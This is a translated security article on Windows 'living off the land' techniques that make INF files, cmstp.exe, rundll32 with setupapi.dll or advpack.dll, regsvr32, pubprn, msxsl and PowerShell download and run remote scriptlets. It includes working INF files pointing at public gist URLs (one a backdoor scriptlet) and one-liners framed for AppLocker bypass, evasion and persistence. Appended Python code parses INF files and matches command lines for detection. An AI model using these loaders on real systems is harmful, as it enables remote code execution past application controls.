2025-01-16 Update From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 05/31 Report
This article shows how INF script download-and-execute techniques can be used for bypass, AV evasion and persistence. The content is concise and easy to follow; I hope you will get something out of the detailed walkthrough below.
Brief introduction
While researching and testing the MSDN material on how different COM scripts are handled, and combining it with what has been shared online, I found something interesting that may be a new way of remotely invoking script execution.
The most interesting of these is LaunchINFSection.
This article mainly reviews the publicly known ways of executing scripts through INF files, introduces LaunchINFSection, and finally shares some usage notes and points that defenders should pay attention to. Some references to other methods of remote script execution are given at the end.
INF Script execution method
Executing script files (.sct) through an INF configuration file involves InstallHinfSection (setupapi.dll), CMSTP (cmstp.exe) and LaunchINFSection (advpack.dll).
Execute INF Script scripts using InstallHinfSection
Kyle Hanslovan and Chris Bisnett showed something very interesting at DerbyCon 2017, which I have translated and summarized earlier (see my post on persistence and bypass techniques seen through Autoruns). They showed a way to execute .sct script files through a remote call from an INF file:
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 [path to file.inf]
The INF file given by the author is as follows:
;------------------------
; Required Sections
;------------------------
[Version]
Signature=$CHICAGO$
Provider=test
Class=Printer
[Manufacturer]
HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64
;------------------------
; Models Section
;------------------------
[ModelsSection.NTx86]
UnregisterDlls = Squiblydoo
[ModelsSection.NTia64]
UnregisterDlls = Squiblydoo
[ModelsSection.NTamd64]
UnregisterDlls = Squiblydoo
;------------------------
; Support Sections
;------------------------
[DefaultInstall]
UnregisterDlls = Squiblydoo
[Squiblydoo]
11,,scrobj.dll,2,60,https://gist.githubusercontent.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2a66/Backdoor-Minimalist.sct
The command above invokes the default INF section, DefaultInstall. Its UnregisterDlls directive points at the Squiblydoo section, whose entry loads scrobj.dll with the URL as argument, so the specified script file is downloaded and executed through scrobj.dll.
Execute INF Script scripts using CMSTP
Nick Tyrer showed a way to load an INF file with cmstp.exe in order to download an SCT file and execute the COM script inside it. Oddvar Moe has demonstrated using cmstp.exe to bypass the default UAC and AppLocker policies.
The basic usage is as follows:
cmstp.exe /s [file].inf
The contents of the INF file are as follows:
; cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/NickTyrer/0604bb9d7bcfef9e0cf82c28a7b76f0f/raw/676451571c203303a95b95fcb29c8b7deb8a66e0/powersct.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
With the INF file above, cmstp.exe invokes the DefaultInstall_SingleUser section. In that section, the UnRegisterOCXs directive points at the UnRegisterOCXSection section, whose entry loads scrobj.dll with the URL as argument, so the specified SCT file is downloaded and executed through scrobj.dll.
Execute INF Script scripts using LaunchINFSection
According to MSDN, LaunchINFSection is an exported function of the Advanced INF Package Installer (advpack.dll) that runs a named section of an INF file. From an administrator's point of view, an INF file is an instruction file used to install device drivers or Windows .cab packages; it can register Windows binaries (exe, dll, ocx), add registry keys, or set configuration values.
LaunchINFSection is called as follows:
rundll32.exe advpack.dll,LaunchINFSection [file].inf,[INFSection],[Path to Cab].cab,[Installation Flags]
If [INFSection] is omitted, LaunchINFSection runs the default DefaultInstall section. It is also worth noting that advpack.dll exports LaunchINFSectionEx and the ANSI character-set variant LaunchINFSectionA, which perform the same function as LaunchINFSection.
As an example of PoC, we use the following INF and SCT files to test:
INF file (saved as test.inf):
; cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
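All three loaders above (InstallHinfSection, CMSTP and LaunchINFSection) share one INF shape: an install section whose Register*/Unregister* directive names a second section, and an entry in that second section that loads scrobj.dll with a URL as argument. The following Python script is an added example, not code from the original article or from the quoted authors; it parses that section structure and reports exactly that pattern, which is what an analyst triaging a suspicious .inf would look for first. The sample INF texts, the placeholder URLs and the function names are constructed for this example.

```python
"""Static triage of INF files for the scrobj.dll remote-scriptlet pattern.

Added example, not code from the original article or the authors it cites.
It parses the INF section structure and follows the registration directives
the article describes (UnregisterDlls, UnRegisterOCXs and their Register*
counterparts) to their target section, reporting entries that load scrobj.dll
with a URL argument. The sample INF texts below are constructed for this
example, modelled on the public files the article quotes, with placeholder URLs.
"""
import re
from typing import Dict, List, Optional

# Directives whose value names a section of (un)registration entries.
REGISTRATION_DIRECTIVES = {"registerdlls", "unregisterdlls", "registerocxs", "unregisterocxs"}
URL_RE = re.compile(r"https?://[^\s,\"]+", re.IGNORECASE)


def parse_inf(text: str) -> Dict[str, List[str]]:
    """Return {section name (lower-case): [entry lines]}.

    Full-line and trailing ';' comments and blank lines are dropped. Quoted
    strings containing ';' are not handled; the files in the article have none.
    """
    sections: Dict[str, List[str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def find_scrobj_loads(sections: Dict[str, List[str]]) -> List[dict]:
    """Follow every registration directive to its target section and report
    entries there that name scrobj.dll, together with the first URL argument."""
    findings = []
    for install_section, entries in sections.items():
        for entry in entries:
            key, sep, value = entry.partition("=")
            if not sep or key.strip().lower() not in REGISTRATION_DIRECTIVES:
                continue
            target = value.strip().lower()
            for target_entry in sections.get(target, []):
                if "scrobj.dll" not in target_entry.lower():
                    continue
                urls = URL_RE.findall(target_entry)
                findings.append({
                    "install_section": install_section,
                    "directive": key.strip(),
                    "entry_section": target,
                    "url": urls[0] if urls else None,
                })
    return findings


def triage_inf(text: str) -> List[dict]:
    """Convenience wrapper: parse and report in one call."""
    return find_scrobj_loads(parse_inf(text))


# Constructed sample in the cmstp.exe / LaunchINFSection style (UnRegisterOCXs).
SAMPLE_CMSTP_INF = r"""
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://example.invalid/placeholder.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
"""

# Constructed sample in the setupapi.dll,InstallHinfSection style (UnregisterDlls).
SAMPLE_SETUPAPI_INF = r"""
[Version]
Signature=$CHICAGO$
Provider=test
Class=Printer

[DefaultInstall]
UnregisterDlls = Squiblydoo

[Squiblydoo]
11,,scrobj.dll,2,60,https://example.invalid/placeholder.sct
"""

# Constructed benign INF: a registration directive that loads an ordinary DLL.
SAMPLE_BENIGN_INF = r"""
[Version]
Signature=$CHICAGO$

[DefaultInstall]
RegisterDlls = RegSection

[RegSection]
11,,mycomponent.dll,1
"""

if __name__ == "__main__":
    for label, inf in [("cmstp", SAMPLE_CMSTP_INF), ("setupapi", SAMPLE_SETUPAPI_INF), ("benign", SAMPLE_BENIGN_INF)]:
        print(label, triage_inf(inf))
```

The parser is deliberately forgiving about whitespace around `=` and section names, since both styles quoted in the article differ only in casing and spacing; a real INF also allows `%strkey%` substitutions from the [Strings] section, which this triage ignores because the scrobj.dll entry and its URL are written out literally in every file shown here.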
SCT file (script blocks only):
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
}
]]>
Use the following command to execute it:
rundll32.exe advpack.dll,LaunchINFSection test.inf,DefaultInstall_SingleUser,1
If the network is reachable, our lovely calculator appears.
We can also start the program in a slightly different way: if the entry section in the INF file is renamed to DefaultInstall, the program can be executed with the following command without specifying a section name:
rundll32.exe advpack.dll,LaunchINFSection test.inf,1
In addition, the uninstall directive (UnRegisterOCXs) can be changed to the install/register directive RegisterOCXs, and the section can be given any name.
Usage and defense
Bypass, AV evasion and persistence
CMSTP can be used to evade Autoruns when the "Hide Windows Entries" filter is enabled, as shown below (screenshot not reproduced here).
When that filter is not enabled, the CMSTP autostart entries are displayed as follows (screenshot not reproduced here).
Note: LaunchINFSection and InstallHinfSection do not evade the newer versions of Autoruns, because this startup method relies on rundll32.exe calling the corresponding DLL, and Autoruns still displays such entries when the filter is enabled. However, LaunchINFSection does provide a way to obtain code execution through a whitelisted program, bypassing AppLocker rules.
Traffic in the network
The following figure shows the traffic generated when scrobj.dll downloads the SCT file (figure not reproduced here).
Any file name
SCT files are just text/XML documents and INF files are just text documents, so even with an extension other than .sct or .inf they can still be executed successfully. (The translator did not succeed in reproducing this experiment; I hope you can give me some advice!)
Other methods
Executing through an INF file is not the only way to run SCT script files; there are some other ways:
RegSvr32/Scrobj.dll
regsvr32 /s /n /u /i:http://url/file.sct scrobj.dll
PubPrn
pubprn.vbs 127.0.0.1 script:http://url/file.sct
Invoking Microsoft.JScript.Eval through PowerShell
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript'); [Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:http://url/file.sct").Exec()', [Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())
Invoking Microsoft.VisualBasic.Interaction through PowerShell
[Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic'); [Microsoft.VisualBasic.Interaction]::GetObject('script:http://url/file.sct').Exec(0)
It is worth noting that .sct is not the only file type that works; there are others, for example:
MsXSL
msxsl.exe http://url/file.xml http://url/file.xsl
Invoking System.Xml.Xsl.XslCompiledTransform through PowerShell
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('http://url/file.xsl',$s,$r);$x.Transform('http://url/file.xml','z');del z
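For defenders, the practical value of the "Usage and defense" section and of the "Other methods" list is that every technique has a recognisable process-creation shape: a signed Windows binary with a command line that names an INF section runner, scrobj.dll with a URL, or a script:/xsl URL. The following Python snippet is an added example, not code from the original article; it turns those shapes into simple rules and runs them over constructed, Sysmon-style process-creation records. The field names, sample command lines, placeholder hostnames and rule names are assumptions made for this example.

```python
"""Detection rules for the INF / remote-scriptlet command-line patterns.

Added example, not from the original article. Each rule pairs an image-name
pattern with a command-line pattern taken from the shapes the article lists.
The event records and their field names (pid, image, command_line) are
constructed here to resemble Sysmon event ID 1 / Security 4688 data.
"""
import re
from typing import Dict, List, Tuple

# (rule name, image regex anchored at the file name, command-line regex); all case-insensitive.
RULES: List[Tuple[str, str, str]] = [
    ("rundll32_installhinfsection", r"rundll32\.exe$", r"setupapi\.dll\s*,\s*installhinfsection"),
    ("rundll32_launchinfsection",   r"rundll32\.exe$", r"advpack\.dll\s*,\s*launchinfsection(ex|a|w)?\b"),
    ("cmstp_inf_install",           r"cmstp\.exe$",    r"(^|\s)/s\b.*\.inf\b"),
    ("regsvr32_scrobj_url",         r"regsvr32\.exe$", r"/i:\s*https?://.*scrobj\.dll"),
    ("pubprn_remote_scriptlet",     r"[wc]script\.exe$", r"pubprn\.vbs.*\sscript:"),
    ("msxsl_remote_xsl",            r"msxsl\.exe$",    r"https?://\S+\s+https?://\S+"),
    ("powershell_jscript_eval",     r"powershell\.exe$",
     r"microsoft\.jscript.*getobject\s*\(\s*['\"]script:"),
    ("powershell_vb_getobject",     r"powershell\.exe$",
     r"microsoft\.visualbasic\.interaction.*getobject\s*\(\s*['\"]script:"),
    ("powershell_xslcompiledtransform", r"powershell\.exe$", r"xslcompiledtransform.*enablescript"),
]


def match_event(image: str, command_line: str) -> List[str]:
    """Return the names of all rules whose image and command-line patterns both match."""
    hits = []
    for name, image_re, cmd_re in RULES:
        if re.search(image_re, image, re.I) and re.search(cmd_re, command_line, re.I):
            hits.append(name)
    return hits


def scan_events(events: List[Dict]) -> List[Tuple[int, List[str]]]:
    """Return (pid, [rule names]) for every event that matches at least one rule."""
    results = []
    for event in events:
        hits = match_event(event["image"], event["command_line"])
        if hits:
            results.append((event["pid"], hits))
    return results


# Constructed sample events: three matching the article's techniques, two benign.
SAMPLE_EVENTS = [
    {"pid": 4112, "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe advpack.dll,LaunchINFSection C:\Users\u\test.inf,DefaultInstall_SingleUser,1"},
    {"pid": 4120, "image": r"C:\Windows\System32\cmstp.exe",
     "command_line": r"cmstp.exe /s C:\Users\u\cmstp.inf"},
    {"pid": 4133, "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32 /s /n /u /i:http://example.invalid/file.sct scrobj.dll"},
    {"pid": 4140, "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL"},  # benign control-panel launch
    {"pid": 4151, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -c Get-Process"},  # benign
]

if __name__ == "__main__":
    for pid, hits in scan_events(SAMPLE_EVENTS):
        print(pid, ", ".join(hits))
```

These matches are triage signals rather than verdicts: setupapi.dll,InstallHinfSection and cmstp.exe have legitimate uses in driver and Connection Manager profile installation, so a hit should be enriched with the INF content, the network connection made by the rundll32/cmstp/regsvr32 process, and any child process it spawns.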
The above is how INF script download-and-execute techniques can be used for bypass, AV evasion and persistence. Have you learned something from it?